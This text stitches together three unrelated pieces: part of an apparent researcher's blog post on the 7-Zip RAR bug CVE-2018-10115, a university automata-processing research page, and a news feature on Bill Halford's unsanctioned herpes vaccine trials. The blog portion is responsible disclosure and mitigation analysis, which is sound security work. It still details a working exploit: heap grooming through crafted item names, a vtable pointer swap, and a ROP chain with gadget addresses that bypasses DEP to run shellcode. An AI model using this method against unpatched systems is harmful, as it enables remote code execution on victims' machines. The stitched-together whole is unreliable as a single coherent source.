  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.
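To make the second option concrete, here is a rough, self-contained C++ sketch of the idea; the class and method names are illustrative only and do not reproduce 7-Zip's actual patch:

#include <cstddef>
#include <cstdint>

// Illustrative sketch only -- not 7-Zip's actual code. The decoder refuses to
// honor a "solid" request until it has been initialized at least once with
// isSolid == false, so its state can never be used uninitialized.
class DecoderSketch {
  bool _solidAllowed = false;  // initialized here, so never uninitialized
  bool _isSolid = false;

public:
  bool SetDecoderProperties(const uint8_t *data, size_t size) {
    if (size < 1) return false;
    bool isSolid = (data[0] != 0);
    if (isSolid && !_solidAllowed)
      isSolid = false;           // downgrade (or alternatively: fail) the unsafe request
    _isSolid = isSolid;
    return true;
  }

  void Decode() {
    if (!_isSolid)
      InitState();               // (re)initialize the full decoder state
    _solidAllowed = true;        // from now on, solid items are legitimate
    // ... actual decoding omitted ...
  }

private:
  void InitState() { /* reset tables, window sizes, indices, ... */ }
};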

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll, 7-zip.dll, 7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe, 7zG.exe, 7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe, 7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Using the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe, 7zG.exe, 7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to fix the extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);
  else
    break;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NtoPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _window, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object. _window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _window buffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with multiple of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object in constant distance to any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before the Rar1 decoder, because only then will the solidStart flag be set to false, so that the next decoder is not initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open2 reads all items of the archive with the following code (simplified):

CItem item;
for (;;)
{
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled)
  {
    // some more code omitted
    break;
  }
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted
  _items.Add(item);
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom:

void AString::SetFrom(const char *s, unsigned len)
{
  if (len > _limit)
  {
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  }
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method will always terminate the string with a null byte. Moreover, we see that AString keeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.
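To make the trick concrete, here is a small standalone C++ simulation of SetFrom's buffer-reuse behavior (this is not 7-Zip code; the byte values correspond to the DEAD00BEEF00BAAD00 example above):

#include <cstdio>
#include <cstring>

// Simplified stand-in for AString::SetFrom: the buffer is reused whenever it
// is already large enough, and a terminating null byte is always appended.
struct MiniAString {
  char *_chars = nullptr;
  unsigned _limit = 0;
  void SetFrom(const char *s, unsigned len) {
    if (len > _limit) {
      char *newBuf = new char[len + 1];
      delete[] _chars;
      _chars = newBuf;
      _limit = len;
    }
    if (len != 0) memcpy(_chars, s, len);
    _chars[len] = 0;
  }
};

int main() {
  MiniAString name;
  // Null bytes in the target sequence are replaced by 0x55; the names are
  // processed in order of non-increasing length, so the buffer is reused.
  const unsigned char n1[] = {0xDE, 0xAD, 0x55, 0xBE, 0xEF, 0x55, 0xBA, 0xAD};
  const unsigned char n2[] = {0xDE, 0xAD, 0x55, 0xBE, 0xEF};
  const unsigned char n3[] = {0xDE, 0xAD};
  name.SetFrom((const char *)n1, sizeof n1);  // buffer: DE AD 55 BE EF 55 BA AD 00
  name.SetFrom((const char *)n2, sizeof n2);  // buffer: DE AD 55 BE EF 00 BA AD 00
  name.SetFrom((const char *)n3, sizeof n3);  // buffer: DE AD 00 BE EF 00 BA AD 00
  for (unsigned i = 0; i < 9; i++)
    printf("%02X", (unsigned char)name._chars[i]);
  printf("\n");  // prints DEAD00BEEF00BAAD00
}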

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocations of this type need to be strictly increasing in size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.

ROP

We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAlloc, memcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;
exit(0);

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.

Conclusion

In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, it is doomed to fail.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my e-mail address on the about page.

Timeline of Disclosure

  • 2018-03-06 - Discovery
  • 2018-03-06 - Report
  • 2018-04-14 - MITRE assigned CVE-2018-10115
  • 2018-04-30 - 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

Thanks & Acknowledgements

I would like to thank Igor Pavlov for fixing the bug and for enabling further exploitation mitigations in 7-Zip.

Virginia Engineering CAP Research



Our Research

The Center conducts fundamental research on foundations and applications of automata computing; the Automata Processor is a novel, massively parallel computational accelerator capable of 1-2 order-of-magnitude speedups within existing computer system form factors and power constraints.

The Center’s collaborative approach facilitates teaming and accelerates commercialization. Mission-driven agencies can partner with the Center to research how automata computing can address critical challenges, including NP-hard problems that are currently considered unsolvable. The Center’s partnership with UVa’s Applied Research Institute provides access to secure research facilities for conducting sensitive research and development. 

Research areas include:

  • algorithm development
  • hybrid computing
  • new programming languages
  • biomedical informatics
  • business/consumer informatics
  • cyber-security
  • entity resolution
  • graph analytics
  • hierarchical temporal memory
  • natural language processing

“As an emerging computer scientist and an early-career computer architecture researcher, I am thrilled to be working on Micron’s new Automata Processor (AP). The opportunity to be the first to benchmark, evaluate and develop applications for an industry-new technology is extraordinary.  I am drawn to the novelty of the AP’s unique MISD architecture.  We have already successfully demonstrated performance superiority of this new processor for certain class of applications.  I am very excited to continue my work exploring new capabilities for the AP.” – Jack Wadden, Graduate Research Assistant 

CAP Research Tools

MNCaRT - An open-source, multi-architecture automata processing ecosystem with Docker image.

VASIM - An Automata Simulator for the CPU.

ANMLZoo - Automata Benchmarks.

REAPR - A framework for accelerating automata on FPGAs.

DFAGE - A framework for accelerating DFAs on GPUs.

MNRL - JSON Automata Representation

AutomataToRouting - An open-source toolchain to design and evaluate island style spatial automata processing architectures. 

CAP Publications, Reports, and Presentations

Performance Evaluation of Regular Expression Matching Engines Across Different Computer Architectures - V. Dang, J. Wadden, M. El-Hadedy, X. Huang, K. Wang, M. Stan, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Entity resolution acceleration using Micron’s Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Sequential pattern mining with the Micron Automata Processor - K. Wang, E. Sadredini, K. Skadron.  ACM International Conference on Computing Frontiers (CF 2016)

RAPID Programming of Pattern-Recognition Processors - K. Angstadt, W. Weimer, and K. Skadron.  Proceedings of the ACM International Symposium on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2016, to appear)

Brill Tagging on the Micron Automata Processor - K. Zhou, K. Wang, J. Fox, and D. Brown.  IEEE International Conference on Semantic Computing (ICSC 2015)

Entity Resolution using the Micron Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. 5th International Workshop on Architectures and Systems for Big Data (ASBD), in conjunction with the 42nd International Symposium on Computer Architecture (ISCA 2015).

Association Rule Mining with the Micron Automata Processor - K. Wang, M. Stan, and K. Skadron. 29th IEEE International Parallel & Distributed Processing Symposium (IPDPS 2015).

Generating efficient and high-quality pseudo-random behavior on Automata Processors - J. Wadden, N. Brunelle, K. Wang, M. El-Hadedy, G. Robins, M. Stan, and K. Skadron. 2016 IEEE 34th International Conference on Computer Design (ICCD16)

An Overview of Micron’s Automata Processor - K. Wang, K. Angstadt, C. Bo, N. Brunelle, E. Sadredini, T. Tracy II, J. Wadden, M. R. Stan, and K. Skadron. Proceedings of the International Conference on Hardware/Software Codesign and System Synthesis (CODES+ISSS), Oct. 2016.

Frequent Subtree Mining on the Automata Processor: Challenges and Opportunities - E. Sadredini, K. Wang, and K. Skadron. Proceedings of the ACM International Conference on Supercomputing (ICS), June 2017.

Automata-to-Routing: An Open-Source Toolchain for Design-Space Exploration of Spatial Automata Processing Architectures - J. Wadden, Samira Khan, and K. Skadron. Proceedings of the IEEE International Symposium on Field-Programmable Custom Computing Machines (FCCM), Apr. 2017.

MNRL and MNCaRT: An Open-Source, Multi-Architecture State Machine Research and Execution Ecosystem - K. Angstadt, J. P. Wadden, W. Weimer, and K. Skadron. Tech. Report CS-2017-01, Univ. of Virginia Dept. of Computer Science, May 2017

RAPID: Accelerating pattern search applications with reconfigurable hardware - K. Angstadt, J. Wadden, X. Huang, M. El-Hadedy, W. Weimer, and K. Skadron, SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Toward machine learning on the Automata Processor - T. Tracy II, Y. Fu, I. Roy, E. Jonas, P. Glendenning. International Supercomputing Conference – High Performance Computing (ISC-HPC 2016).

Cellular Automata on the Micron Automata Processor - K. Wang and K. Skadron; University of Virginia Technical Report #CS-2015-03.

Nondeterministic Finite Automata in Hardware – the Case of the Levenshtein Automaton - T. Tracy, M. Stan, N. Brunelle, J. Wadden, K. Wang, K. Skadron, G. Robins. 5th International Workshop on Architectures and Systems for Big Data (ASBD), in conjunction with the 42nd International Symposium on Computer Architecture (ISCA 2015).

Regular expression acceleration on the micron automata processor: Brill tagging as a case study - Zhou et al;  IEEE International Conference on Big Data (Big Data 2015)

Fast Track Pattern Recognition in High Energy Physics Experiments with the Automata Processor - M. Wang, G. Cancelo, C. Green, D. Guo, K. Wang, and T. Zmuda. Nuclear Instruments and Methods in Physics Research Section A: Accelerators, Spectrometers, Detectors and Associated Equipment.

ANMLZoo: A benchmark Suite for exploring bottlenecks in Automata Processing engines and architectures - J. Wadden, V. Dang, N. Brunelle, T. Tracy, D. Guo, E. Sadredini, K. Wang, C. Bo, G. Robins, M. Stan, and K. Skadron. 2016 IEEE International Symposium on Workload Characterization (IISWC’16)

Feature Extraction and Image Retrieval on an Automata Structure - T. Ly, R. Sarkar, K. Skadron, and S. T. Acton. Proceedings of the 50th Asilomar Conference on Signals, Systems and Computers, Nov. 2016.

Entity Resolution Acceleration using Micron’s Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. Proceedings of the 2016 IEEE International Conference on Big Data (BigData), Dec. 2016.

Hierarchical Pattern Mining with the Micron Automata Processor - K. Wang, E. Sadredini, and K. Skadron. International Journal of Parallel Programming (IJPP), Jan. 2017.

Fast Searching for Potential gRNA Off-Target Sites for CRISPR/Cas9 using Automata Processing - C. Bo, E. Sadredini, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2017)

REAPR: Reconfigurable Engine for Automata Processing - T. Xie, V. Dang, J. Wadden, K. Skadron, and M. Stan. 27th International Conference on Field Programmable Logic and Applications (FPL 2017)  

CAP White Papers

Our group has demonstrated tremendous application potential using Micron’s Automata Processor. Below are some example application areas that may be of interest to industry partners and government sponsors. In addition to leading expertise on (and to date, exclusive access to) AP technology, our team also has extensive experience and expertise with hardware acceleration in general.

If you are a company or research lab, and are interested in exploring how the AP and other hardware acceleration technologies can be applied to meet your needs, please contact us and we will respond shortly; and if appropriate, we will be more than happy to develop a white paper to address your needs.

Cybersecurity

The AP’s massively parallel operation allows it to quickly check for prescribed patterns and their variations. This capability enables the AP to be uniquely suited for cybersecurity applications such as packet inspection and attribution. We believe there is a wide range of applications for AP technology in industry and national defense.

Data Reduction

The advent of Big Data brought unprecedented opportunities but also significant analytics challenges. The AP’s ability to quickly implement association rule mining (ARM) algorithms such as frequent itemset, sequential pattern mining, and frequent subtree mining can quickly identify relations and patterns in massive datasets. We also believe tremendously valuable insight can be gained from open internet sources such as social media platforms. However, the volume, variety, velocity, and veracity of internet open source data pose a formidable challenge. The AP’s ability to speed up entity resolution (ER) can be leveraged to perform attribution on internet open source data. ARM and ER are a few examples of how we think the AP can be effectively applied for data reduction.

Approximate string matching/ Bioinformatics

Aligning DNA reads to a reference genome is a common and time-consuming process. We have demonstrated significant speedups implementing DNA alignment on the AP. Furthermore, the AP’s NFA flexibility allows it to be very effective at tolerating variations (gaps, mutations, and insertions) in candidate patterns. This capability is analogous to approximate string matching. That is, the AP is able to effectively match string patterns with varied edit distance. We envision many relevant research and industry applications based on this powerful capability.


A Dying Scientist and His Rogue Vaccine Trial


In a photo from 2009, Bill Halford, who was then 40 years old, looks like a schoolboy who hasn’t quite grown into his big ears. He wears an ill-fitting red shirt tucked into belted khakis; his jawline is square and his eyes are full of wonder. The picture was taken at Southern Illinois University, where he was a respected professor. A few years before, he had made a significant discovery—one that would determine the course of his life.

Halford, a microbiologist, had taken an interest in the peculiar nature of herpes—how it lies dormant in the nervous system and reactivates to cause disease. Herpes is one of the most pervasive viral infections in the world, sometimes causing painful genital blisters, and it has frustrated scientists attempting to find a cure. But in 2007, Halford realized that a weakened form of the virus he’d been studying might serve as a vaccine. He designed an experiment in which he inoculated mice with this variant, then exposed them to the wild-type form of the virus. In 2011 he published the results: Virtually all the mice survived. By contrast, animals that were not injected with his vaccine died in large numbers. It was promising science.

That same year, however, Halford became seriously ill. At first he thought he had a sinus infection, but it turned out to be a rare and aggressive form of cancer, sinonasal undifferentiated carcinoma. Halford was 42 years old at the time, with two teenage children. He underwent chemotherapy and radiation followed by surgery, but he was told that the form of cancer he had did not usually stay at bay for long. Halford had always been determined—“a 90-hours-a-week sort of researcher,” as his wife, Melanie Halford, puts it. The cancer diagnosis only seemed to harden his focus. Others had tried, and failed, to develop a herpes vaccine, but Halford was convinced that his method—using a live, attenuated form of the virus—would succeed. He would use whatever time he had left to show he was right.

The trouble was that the institutional gatekeepers of science—the agencies that fund research—didn’t view his work with the same urgency. He wasn’t getting the grants he thought he deserved. He felt “alone in the wilderness,” Melanie says, but also certain that his formula held unique promise. The question that drove him was not the practical “Will this work?” but rather an ethical one: “If I can help people suffering from herpes, isn’t it my duty to do so?” Melanie told me that “it was completely obvious to him what needed to be done.” Halford decided to barrel forward on his own unorthodox terms.

People with herpes who scoured the internet for research on their condition often discovered Halford’s scientific writing and blog posts, which combined technical information and a wry frustration with the status quo. Several readers reached out to Halford for help. A woman named Carolyn, who ran a private Facebook group devoted to genital herpes, approached him in 2012, and a few months later, Halford got back in touch and suggested they talk by phone. “That’s when he told me he had been fighting cancer and felt he needed to find out if the vaccine he developed could be therapeutic,” Carolyn recalls. In his animal research, Halford was testing whether his attenuated virus could prevent herpes, but scientists were also studying whether herpes vaccines could treat the disease. Carolyn suffered from debilitating nerve pain, and when Halford asked if she wanted to try the drug, she says, “I felt like I had hit the lottery.”

Carolyn suffered from debilitating nerve pain, and when Halford asked if she wanted to try the drug, she says, “I felt like I had hit the lottery.”

Through his blog and Carolyn’s Facebook group, Halford found other potential research subjects. He told them that the vaccine carried risks, as all vaccines do, but claimed that his formulation was “much safer” than those used for measles, mumps, polio, and chicken pox. Halford reassured the skeptical that he had tested his formula on himself, despite being weak from chemo, and had injected family members, and that they had “no side effects,” says Carolyn, who did not want to give her last name because of the stigma attached to herpes. Halford answered the potential volunteers’ questions by email and in long phone conversations. He sent at least one of them pictures of the large, red welts that were likely to develop on their calves around the injection site.

In August 2013, Carolyn drove six hours from Kentucky, where she lives, to Springfield, Illinois, where she had booked a room at the Holiday Inn Express. That evening, she and seven other volunteers, who had come from all over the country, gathered with Halford in one of the hotel rooms, where they sat on chairs, the couch, and the bed. “People were excited,” Carolyn recalls. Halford arrived with a box, which contained a tray and small vials, and began “mixing what appeared to be components of the vaccine right there,” Carolyn says. When her turn came, he took a sample of blood, then swabbed her calf with alcohol and drew a circle on the skin with a black felt-tip pen. Within the circle, he injected the mixture. A bump appeared, followed later by a welt.

In subsequent months, the volunteers gathered in Springfield twice more for injections. The Halfords invited them to their home for dinner. “We were telling Bill and his wife our stories, and they listened,” Carolyn says. “They are good people.”

As a seasoned researcher, Halford was certainly aware that his behavior violated ethical norms, and probably federal regulations as well. The Food and Drug Administration requires that researchers get permission before using an unapproved drug or agent on people in the United States, according to Hank Greely, an expert in biomedical ethics at Stanford Law School. Halford had not said a word to the agency about his plans, nor did he intend to say anything publicly. That “would be suicide,” he told participants in an email obtained by Kaiser Health News. Still, he believed that his brazen behavior would advance the cause of his vaccine; and in one sense, he was right.

Agustin Fernandez is a Hollywood film executive—Badge of Honor, a Martin Sheen drama, is his best known movie. Brash and gregarious with a bald head and, sometimes, a trim goatee, he splits his time between New York and Los Angeles. He also has an outsized fear of herpes. Years ago he started dating a woman with the virus. And at first he thought, “OK, what’s the big deal, you get a rash.” But over time he saw how she suffered during outbreaks and began to fear that he would become infected. “It just completely consumed me,” he says.

Fernandez threw himself into online research and, like Carolyn, soon came across Halford’s work. “I just made it my mission to meet him,” Fernandez says. Eventually, Fernandez persuaded Halford to fly to New York and join him for dinner at Frankies 570 Spuntino Italian restaurant. They talked for hours. “Bill probably still thought I was a crazy guy,” Fernandez says. “I was just on a very selfish mission.” Still, they met again in Chicago. Halford confided to Fernandez that he’d secretly tested the vaccine in humans and that a participant named Carolyn had not experienced herpes outbreaks since the injections and had even stopped taking antiviral medications. “I thought I’d found the holy grail,” Fernandez says.

To Fernandez, the next step seemed obvious: Start a company. Fernandez didn’t know much about scientific research, but he did know how to intrigue investors. He figured a herpes vaccine would be an easy sell, and more gratifying than raising money for a Hollywood movie. “It’s not like, ‘This is so great, Steven Seagal is going to punch a mummy in the face!’ This is like, ‘We can really change the world.’ ”

In 2015 Halford and Fernandez founded Rational Vaccines. Fernandez provided most of the initial money and then reached out to friends and family, raising a total of around $700,000. Halford cared mainly about intellectual control; he would oversee the science. The company also licensed a patent for Halford’s work from Southern Illinois University, where Halford remained a professor.

Halford started making plans for a clinical trial overseas, outside the jurisdiction of the FDA—a not uncommon strategy. He never seriously considered submitting plans to the agency, which would have required him to manufacture the vaccine in a standardized manner and comply with the FDA’s oversight and requirements. “It takes years and years,” Melanie says—years that Halford did not anticipate having.


Pharmacological testing of any kind involves risks, and the standards for vaccine safety have evolved over time. Edward Jenner, the late-18th-century English scientist, demonstrated that he could protect an 8-year-old boy from smallpox by exposing him to a related virus called cowpox. It wasn’t until the 1950s, however, when the American virologist Jonas Salk developed a polio vaccine, that the modern era of mass inoculation began. Polio had left thousands of children paralyzed, and Salk’s vaccine is rightly viewed as a triumph of 20th-century science. At the same time, problems at one of the first production labs led to vaccine contamination that paralyzed 164 children and killed 10 others, a tragedy that might have been averted with better safety testing.

Improved oversight of drug development arrived in 1962 with the modernization of the FDA. In the wake of the thalidomide scandal, in which a drug to treat morning sickness was found to cause birth defects, the agency began requiring companies to complete three phases of clinical testing, demonstrating the safety and efficacy of their products. Scrutiny of vaccines increased too. In the early days, researchers typically tested vaccines on a few thousand people at a cost of several million dollars. Now they are expected to conduct trials with tens of thousands of subjects, with expenses in the hundreds of millions. Regulators also have strict requirements for ensuring the purity of products that will be tested in humans and tend to be cautious about side effects. “The bar has gotten much higher,” says Paul Offit, director of the Vaccine Education Center at Children’s Hospital of Philadelphia.

This can make it hard for small companies to develop vaccines, even when they report promising data. Last fall, Genocea, a small biotech firm, got as far as successful Phase II trial results for a herpes vaccine, but then the company announced that it was halting the effort. It lacked the capital to continue to the next phase of trials, which CEO Chip Clark says would have cost $150 million. (Genocea says it’s still looking to partner with a larger pharmaceutical company.) Given the FDA’s regulatory standards, some good vaccines surely don’t make it to market because the financial burdens are too great.

To Halford, however, any obstacle to his vaccine seemed an injustice. His cancer returned in early 2016, and this time “his doctors were out of good options,” Melanie says. Neither radiation nor surgery was feasible, so he was left with chemotherapy. Each month he received several days of grueling treatment, which left him nauseated and exhausted. Then he plunged into work again, conducting research and planning for a clinical trial on the Caribbean island of Saint Kitts, before starting the chemo cycle over again.

Halford began to recruit participants for the clinical trial through his personal blog. The desperation he found in the potential volunteers echoed the urgency of his own prognosis, and he was more responsive to their queries than many of their own doctors had been. A woman named Beth Erkelens, who lives in Colorado, learned about Halford’s work from a Google search that led to his blog. She called him about the clinical trial, and they talked, she says, “for like an hour.” At the time, Erkelens felt desperate. She was 45 years old and, for years, experienced nearly constant itching, as well as about 12 full-blown outbreaks a year. She felt she had nothing to lose and was swayed by Halford’s bold assurances, as well as his promise that Rational Vaccines would reimburse her for airfare and hotel for three trips to Saint Kitts. “It was his confidence that drew everyone in,” she says.

So when Halford sent Erkelens an informed-consent document laying out the potential risks of participation and noting that the trial would not include FDA oversight, she signed it without hesitation.

